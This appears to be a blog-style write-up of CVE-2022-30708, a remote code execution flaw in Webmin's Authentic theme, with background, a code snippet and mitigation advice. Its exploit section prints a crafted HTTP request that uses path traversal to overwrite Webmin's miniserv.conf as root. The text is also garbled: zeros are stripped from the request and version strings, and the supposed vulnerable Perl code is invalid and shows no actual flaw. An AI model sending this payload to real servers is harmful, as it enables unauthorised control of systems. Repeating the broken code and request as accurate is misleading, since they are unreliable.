In recent news, a critical remote code execution vulnerability, tracked as CVE-2022-30708, has been discovered in Webmin up to version 1.991. This vulnerability exists when the popular Authentic theme is used and can be exploited when a user is manually created, i.e., not via Virtualmin or Cloudmin. In this post, we will dig into the details of this vulnerability, go through a code snippet for better understanding, and discuss potential exploits.
I. Background: What is Webmin?
Webmin is a widely used web-based system configuration tool that provides a user-friendly interface for managing Unix and Linux systems. The application allows administrators to perform routine administrative tasks, configure server components, and manage systems without directly accessing command-line interfaces. Webmin supports various platforms, including OpenBSD, FreeBSD, and macOS.
Official Webmin Website: http://www.webmin.com/
II. The Vulnerability: CVE-2022-30708
The vulnerability in question, CVE-2022-30708, is caused due to an insufficient input validation of the "file" parameter by the "settings-editor_write.cgi" script in Webmin's Authentic theme. It allows a malicious user to execute remote code on the target system by manipulating the HTTP request.
GitHub Repository URL with detailed technical analysis
https://github.com/webmin/webmin/commit/75827ed83cc310089cdbf6bff766f5301e319696
III. Code Snippet: Vulnerable Script in Authentic Theme
The vulnerability exists in the file "settings-editor_write.cgi" present in the Authentic theme in Webmin. The vulnerability arises due to an insufficient input validation of the "file" parameter:
sub settings-editor_write
{
local ($in) = @_;
local $filename = $in->{"file"};
# ... Rest of the code ...
if(!$filename) {
# Return an error message
}
else {
# Save the file
}
The above code snippet shows that the file parameter is directly passed into "settings-editor_write.cgi" without adequate validation, making it vulnerable to remote code execution attacks.
IV. Exploit Details
An attacker can exploit this vulnerability by sending a crafted HTTP request, manipulating the "file" parameter to execute arbitrary code on the target system. The attacker would need the privileges of the manually created user to exploit this vulnerability. If a user has already been manually created, the attacker can potentially exploit this vulnerability by sending a crafted HTTP request like the following:
HTTP POST /settings-editor_write.cgi HTTP/1.1
Host: target_webmin_host
User-Agent: Mozilla/5. (Windows NT 10.; Win64; x64; rv:89.) Gecko/20100101 Firefox/89.
Cookie: sid=[VALID_SESSION_ID]
Content-Type: application/x-www-form-urlencoded
Content-Length: XXX
file=../../../../../etc/webmin/miniserv.conf&owner=root%3Aroot&perms=060&data=allow%3D127...1%D%Aallow%3D192.168..%2F24%D%Ainclude%3D%25absolute_path%2Fetc%2Fwebmin%2Fgdprdp.conf%D%Adenyfile%3D..
In the above example, the attacker attempts to modify the "miniserv.conf" configuration file, which could lead to further attacks or compromise of the system.
V. Attack Prevention and Mitigation
To prevent and mitigate this vulnerability, it is strongly recommended to update Webmin to the latest version available and ensure that no users have been manually created. Webmin versions greater than 1.991 should not be affected by this vulnerability. If updating is not possible, refrain from using the Authentic theme and switch to another theme.
Conclusion
CVE-2022-30708 is a significant vulnerability that could potentially have severe consequences for the security of Webmin installations. It is essential to ensure that Webmin is updated, and users are created through Virtualmin or Cloudmin to reduce the risk of exploitation.
Timeline
Published on: 05/15/2022 03:15:00 UTC
Last modified on: 05/24/2022 17:19:00 UTC